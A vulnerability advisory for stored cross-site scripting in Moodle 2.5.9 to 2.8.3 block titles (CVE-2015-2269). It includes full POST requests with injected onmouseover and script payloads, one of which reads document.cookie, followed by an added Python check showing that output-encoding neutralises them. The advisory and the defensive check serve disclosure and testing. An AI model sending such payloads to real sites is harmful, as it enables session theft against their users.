
Moodle 2.5.9 / 2.6.8 / 2.7.5 / 2.8.3 Cross Site Scripting

17 Mar 2015. Reported by LiquidWorm. Type: packetstorm. Source: packetstormsecurity.com

Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Cross-Site Scripting Vulnerability

`  
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting  
  
  
Vendor: Moodle Pty Ltd  
Product web page: https://www.moodle.org  
Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9  
  
Summary: Moodle is a learning platform designed to provide  
educators, administrators and learners with a single robust,  
secure and integrated system to create personalised learning  
environments.  
  
Desc: Moodle suffers from persistent XSS vulnerabilities. Input  
passed to the POST parameters 'config_title' and 'title' through  
index.php is not properly sanitized, allowing an attacker to  
execute HTML or JS code in a user's browser session on the affected  
site. Affected components: Blocks, Glossary, RSS and Tags.  
  
Tested on: nginx  
PHP/5.4.22  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5236  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php  
  
Vendor Advisory ID: MSA-15-0013  
Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383  
  
CVE ID: CVE-2015-2269  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269  
  
  
09.02.2015  
  
--  
  
  
Random Glossary Entry  
---------------------  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_glossary_random_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=304  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_addentry=test  
config_invisible=test2  
config_refresh=0  
config_showconcept=1  
config_title=" onmouseover=prompt("XSS1") >  
config_type=0  
config_viewglossary=test3  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Remote RSS Feeds  
----------------  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_rss_client_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=312  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_block_rss_client_show_channel_image=0  
config_block_rss_client_show_channel_link=0  
config_display_description=0  
config_rssid=_qf__force_multiselect_submission  
config_rssid[]=3  
config_shownumentries=11  
config_title=" onmouseover=prompt("XSS2") >  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Tags  
----  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_tags_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=313  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_numberoftags=80  
config_tagtype=  
config_title=Tags" onmouseover=prompt("XSS3") >  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Older unsupported versions  
--------------------------  
  
POST http://WEB/blog/index.php HTTP/1.1  
  
blockaction=config  
filterselect=1343  
filtertype=user  
instanceid=4992  
numberoftags=20  
sesskey=0QCG5LQz0Q  
sort=name  
timewithin=90  
title=ZSL"><script>alert(document.cookie);</script>  
`
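The following is an added example, not part of the advisory or of Moodle's code. It shows why the title values above are harmless once output-encoded: each is rendered into a hypothetical block template (an assumption, since the advisory does not show the affected markup), and an HTML parser confirms whether any tag or attribute beyond the template's own appears.

```python
from html import escape
from html.parser import HTMLParser

# Title values copied from the advisory's config_title / title parameters.
PAYLOADS = [
    '" onmouseover=prompt("XSS1") >',
    'Tags" onmouseover=prompt("XSS3") >',
    'ZSL"><script>alert(document.cookie);</script>',
]

# Hypothetical block markup (an assumption, not Moodle's real output): the
# title is echoed once into a double-quoted attribute and once as text.
TEMPLATE = ('<div class="block"><input type="text" name="config_title" '
            'value="{t}"><h2>{t}</h2></div>')
EXPECTED_TAGS = ["div", "input", "h2"]
EXPECTED_ATTRS = {"class", "type", "name", "value"}


class MarkupAudit(HTMLParser):
    """Records every start tag and attribute the parser actually sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.update(attrs)


def render_unescaped(title):
    return TEMPLATE.format(t=title)  # title inserted verbatim, no encoding


def render_escaped(title):
    return TEMPLATE.format(t=escape(title, quote=True))  # &, <, >, " and ' encoded


def audit(markup):
    """Return (injected, value): whether unexpected tags or attributes appeared,
    and the value attribute as the parser decoded it."""
    parser = MarkupAudit()
    parser.feed(markup)
    parser.close()
    injected = (parser.tags != EXPECTED_TAGS
                or bool(set(parser.attrs) - EXPECTED_ATTRS))
    return injected, parser.attrs.get("value")


if __name__ == "__main__":
    for p in PAYLOADS:
        print(audit(render_unescaped(p)), audit(render_escaped(p)))
```

The same audit can serve as a regression test for any template that echoes a stored block title: the escaped render must add no tags or attributes, and the parsed `value` must equal the stored title exactly.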
